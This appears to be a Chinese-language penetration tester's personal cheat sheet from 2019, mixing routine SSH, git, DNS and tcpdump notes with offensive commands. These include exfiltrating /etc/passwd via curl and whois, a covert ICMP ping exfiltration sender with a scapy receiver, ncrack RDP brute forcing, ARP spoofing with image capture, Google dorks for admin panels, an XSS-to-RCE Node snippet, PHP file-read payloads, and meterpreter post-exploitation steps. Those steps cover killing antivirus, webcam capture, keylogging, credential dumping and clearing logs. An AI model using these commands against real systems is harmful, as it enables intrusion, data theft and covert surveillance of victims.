日常备忘录
2019-03-04 13:30:14

日常备忘录 [toc]

SSH免密登陆

1
2
3
4
5
6
7
8
9
#客户端
ssh-keygen -t rsa
chmod 700 ~/.ssh
chmod 600 ~/.ssh/id_rsa
ssh-copy-id -i ~/.ssh/id_rsa.pub Smi1e@x.x.x.x -p 12345

#服务器
chmod 700 ~/.ssh
chmod 644 ~/.ssh/authorized_keys

Git代理

1
2
3
4
5
6
7
socks5 代理
git config --global http.proxy 'socks5://127.0.0.1:1080'
git config --global https.proxy 'socks5://127.0.0.1:1080'

http/https 代理
git config --global http.proxy 'http://127.0.0.1:1080'
git config --global https.proxy 'https://127.0.0.1:1080'

三次握手&四次挥手

image.png image.png

无回显读文件

Curl

1
curl -d @/etc/passwd http://127.0.0.1:999

whois

1
whois -h ip -p port `/etc/passwdbase64`

ping 发送端

1
xxd -p -c 4 secret.txt  while read line; do ping -c 1 -p $line ip; done

接收端 以下代码保存到 ping_receiver.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import sys

try:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")
sys.exit(0)


def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 8:
data = pkt[ICMP].load[-4:]
print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)

image.png

dig&nslookup

dig 域名查询工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#从指定的 DNS 服务器上查询
dig @8.8.8.8 www.smi1e.top

#解析ip地址对应的域名
dig -x 8.8.8.8 +short

#跟踪整个查询过程
dig +trace www.smi1e.top

#查找域名对应的CNAME
dig www.smi1e.top -t CNAME +short

#查询域名的解析DNS服务器地址
dig zhouliang.pro ns +short

nslookup 查询域名DNS信息的工具

1
2
3
4
5
6
7
8
#指定查询记录类型的指令格式:
nslookup -qt=类型 目标域名

#IP逆向解析域名:
nslookup -qt=ptr ip

#检查域名的缓存时间:
nslookup -d [其他参数]目标域名

追踪路由

1
traceroute ip

Google Hack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
site:target.com intitle:"后台登录登陆验证码管理员服务系统系统登录认证码验证身份管理系统管理后台管理平台mgmtsysadminadminpasswordloginmanage
site:target.com filetype:"doc docx pdf xls xlsx ppt pptx

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字).
allintext: 搜索结果仅仅是在网页正文里边包 含了我们所有查询关键词的网页
allintitle: 同
allinurl: 同
site: 可以限制你搜索范围的域名.
filetype: 搜索文件的后缀或者扩展名
intitle: 限制你搜索的网页标题.
allintitle: 搜索所有关键字构成标题的网页. 但是推荐不要使用
link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到 所有连

filetype:txt 登录
filetype:xls 登录
filetype:doc 登录
site:xxx.com filetype:文件类型 文件内包含的内容

intitle:"index of" etc

搜C段
site:218.87.21.*

GitHub 语法

Github搜索语法

1
2
3
4
5
6
7
8
9
10
11
12
cats stars:>1000  匹配关键字"cats"且star大于1000的仓库
cats pushed:<2012-07-05 搜索在20120705日前push代码,且cats作为关键字
cats created:>=2017-04-01 创建时间

size:>1000 搜索大小大于1KB的文件
cats in:file 搜索包含代码cats的文件
cats in:path 搜索路径中包含cats的代码
cats in:path,file 搜索路径、文件中包含cats的代码
console path:app/public language:javascript 搜索关键字console,且语言为javascript,在app/public下的代码

filename:config.php language:php 搜索文件名为config.php,且语言为php的代码
extension:EXTENSION 指定扩展名搜索

工具命令

ncrack爆破3389

1
ncrack -vv -u administrator -P '/tmp/D5B0U/1000-top.txt' 10.22.2.3:3389,CL=1 -f

arpspoof 进行Arp欺骗

1
2
3
4
5
6
7
8
9
10
arpspoof -i eth0 -t 靶机ip 靶机网关 

#开启流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward

#双向欺骗
arpspoof -i eth0 -t 靶机ip -r 网关IP

#捕获图片
driftnet -i eth0

tcpdump

一些常用参数

1
2
3
4
5
6
-w :如果你要将监听所得的封包资料储存下来,用这个参数就对了!后面接档名
-c :监听的封包数,如果没有这个参数, tcpdump 会持续不断的监听,
直到使用者输入[ctrl]-c 为止。
-A :封包的内容以ASCII 显示,通常用来捉取WWW 的网页封包资料。
-e :使用资料连接层(OSI 第二层) 的MAC 封包资料来显示;
-q :仅列出较为简短的封包资讯,每一行的内容比较精简

抓取回环网口的包

1
tcpdump -i lo0

以数字显示主机及端口

1
tcpdump -n

过滤端口 协议 网络

1
2
3
4
5
6
7
8
9
10
11
12
13
tcpdump -i eth1 port 25 
tcpdump -i eth1 src port 25 #源端口
tcpdump -i eth1 dst port 25 #目的端口

tcpdump -i eth1 net 192.168
tcpdump -i eth1 src net 192.168 #源地址
tcpdump -i eth1 dst net 192.168 #目的地址

协议过滤
tcpdump -i eth1 arp
tcpdump -i eth1 tcp
tcpdump -i eth1 udp
tcpdump -i eth1 icmp

exp:抓取所有经过eth1,目的地址是192.168.1.254或192.168.1.200端口是80的TCP数

1
tcpdump -i eth1 '((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host 192.168.1.200)))'

快速搭建HTTP server

在当前目录启动 HTTP 服务 python2

1
python -m SimpleHTTPServer 1337

python3

1
python -m http.server 1337

PHP 5.4+

1
php -S 0.0.0.0:1337

XSS RCE

1
2
3
require('child_process').exec( 'ls -lh /usr' , function(err, stdout , stderr ) {
alert( stdout );
});

php I/O

1
2
3
4
var_dump(get_defined_vars()); #所有已定义变量列表的多维数组
print(readdir(opendir(getcwd()))); #列目录
var_dump(scandir(getcwd())); #列目录
print(readfile(readdir(opendir(getcwd())))); #读文件

meterpreter备忘

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
screenshot 查看屏幕截图
wdigest 抓取明文密码(需先load mimikatz)
run killav 杀掉杀毒软件
run webcam 启动摄像头
run sound_recorder 启动声音录制
run get_local_subnets 获取内网网段信息
webcam_snap -i 1 -v false //启动摄像头拍摄一张照片但不打开闪光灯
clearev //清除日志
run post/windows/wlan/wlan_profile //读取无线连接的账号密码
netsh wlan show profiles //读取无线连接的账号密码
getpid 查看当前木马进程号
migrate pid 迁移进程
shell 用于进入目标shell界面
idletime 目标服务器空闲时间
keyscan_start keyscan_dump 键盘记录
portfwd add -l 5555 -p 3389 -r 192.168.198.129 # 端口转发,本机监听5555,把目标机3389转到本机5555
run post/windows/gather/enum_patches #查看补丁信息
Prev
2019-03-04 13:30:14
Next